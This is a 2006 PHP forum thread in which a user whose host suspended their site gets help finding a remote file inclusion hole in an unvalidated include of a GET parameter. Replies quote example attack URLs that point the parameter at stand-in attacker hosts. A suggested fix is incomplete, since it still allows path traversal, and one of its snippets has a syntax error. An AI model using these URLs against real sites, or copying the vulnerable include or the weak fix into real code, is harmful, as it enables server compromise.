Pixelsize Posted July 7, 2006 Share Posted July 7, 2006 Hi there, I think this is the place where to post this question.At the webhosting I'm at, they keep suspending my webpage because my code is vulnerable to attacks. This is the code:[code]<?// Security patch against spam exploit// Provided by TangoWebs$badStrings = array("Content-Type:", "MIME-Version:", "Content-Transfer-Encoding:", "bcc:", "cc:");foreach($_POST as $k => $v){ foreach($badStrings as $v2){ if(strpos($v, $v2) !== false){ header("HTTP/1.0 403 Forbidden"); exit; } }}?><title>Heh I didn't wanna show the site's title xD sry xD</title><link href="style.css" rel="stylesheet" type="text/css"><?php// Variables$page=$_GET['page']; // Gets info// Displayinclude "header.html"; // Shows Headerif ($page=="") { $page="home";}$page=$page . ".html";include $page;include "footer.html";?>[/code]TangoWebs is the name of the webhosting company... they provided this code and asked me to put it, and they say hackers are still sending e-mails, mail bombing, or whatever... from my website. This is just one page, but they are all exactly same, just change on what directory to include. Thanks for your time, I hope anyone could see what I still can't. Cya!! :D Quote Link to comment https://forums.phpfreaks.com/topic/13964-resolved-is-this-an-exploit/ Share on other sites More sharing options...
ToonMariner Posted July 7, 2006 Share Posted July 7, 2006 would need to see the code for generating the e-malis, how the user submits the content for the e-mail and any associated login stuff (like if the user must be logged in and a session is created.).The only thing I could suggest in this little lot is this.record the ip address the request originated from and store this in the database along with the time of the request. Each time the script runs it should check the ip address against the database and if there is not sufficient time between the last e-mail and now - deny the request.I think a 10 minutes interval would be sufficient..... Quote Link to comment https://forums.phpfreaks.com/topic/13964-resolved-is-this-an-exploit/#findComment-54477 Share on other sites More sharing options...
Pixelsize Posted July 7, 2006 Author Share Posted July 7, 2006 No login, no forms... this is all... They say they won't reactivate my account until I can ensure that the code has no security wholes :S So I can't do tests... But do you think anyone could just send e-mails by taking advantage of... what? a $_GET??? Quote Link to comment https://forums.phpfreaks.com/topic/13964-resolved-is-this-an-exploit/#findComment-54480 Share on other sites More sharing options...
ToonMariner Posted July 7, 2006 Share Posted July 7, 2006 well in that case the only vunerability is the include $page bit.Say soneone had a page they had written to send out mass e-mails and it was located here:http://www.dodgeysite.com/email.phpthey could use your page to exploit that by simply setting page=http://www.dodgeysite.com/email.php in the url.On my sites i always use a control on includes that are driven by the users input.my includes always look likeinclude($_SERVER['DOCUMENT_ROOT'] . $page);that way the file being included MUST reside on your domain. Quote Link to comment https://forums.phpfreaks.com/topic/13964-resolved-is-this-an-exploit/#findComment-54485 Share on other sites More sharing options...
wildteen88 Posted July 7, 2006 Share Posted July 7, 2006 This code here is very vunerable![code]if ($page=="") { $page="home";}$page=$page . ".html";include $page;[/code]A malicous attacker can put something like this:yoursite.com?page=http://attackersite.com/badfile.htmlNow within that badfile the attackers made there could be PHP code with would not only affect your account, but everyone elses account on the hosts server, such cause hacvock with the databaseSo whats the way around this. To validate the user input. Before you include make sure:- the page variable doesnt hold urls - preg_match can help you there- make sure the file you are going to be including is actually exists on your site - file_exists can help here toWith file_exists dont do this:if(file_exists($_GET['page']))append your sites document roort to it like so:if(file_exists($_SERVER[['DOCUMENT_ROOT'] . $_GET['page']))Never use raw _GET or POST'd data! Always validate and verify user input. Quote Link to comment https://forums.phpfreaks.com/topic/13964-resolved-is-this-an-exploit/#findComment-54489 Share on other sites More sharing options...
shoz Posted July 7, 2006 Share Posted July 7, 2006 There was recently a discussion similar to this one that you should find useful.http://www.phpfreaks.com/forums/index.php/topic,95407.msg382014.html#msg382014 Quote Link to comment https://forums.phpfreaks.com/topic/13964-resolved-is-this-an-exploit/#findComment-54492 Share on other sites More sharing options...
Pixelsize Posted July 7, 2006 Author Share Posted July 7, 2006 xD!!! GOSH!!! WHAT AN OBVIOUS EXPLOIT, ye, I'll fix it right away - thank you all for your time... gosh, so obvious xD. Thank you all. Cya! Quote Link to comment https://forums.phpfreaks.com/topic/13964-resolved-is-this-an-exploit/#findComment-54494 Share on other sites More sharing options...
Chips Posted July 8, 2006 Share Posted July 8, 2006 [quote author=wildteen88 link=topic=99803.msg393230#msg393230 date=1152296362]append your sites document root to it like so:if(file_exists($_SERVER[['DOCUMENT_ROOT'] . $_GET['page']))[/quote]That's a really useful - thankyou :) Quote Link to comment https://forums.phpfreaks.com/topic/13964-resolved-is-this-an-exploit/#findComment-54740 Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.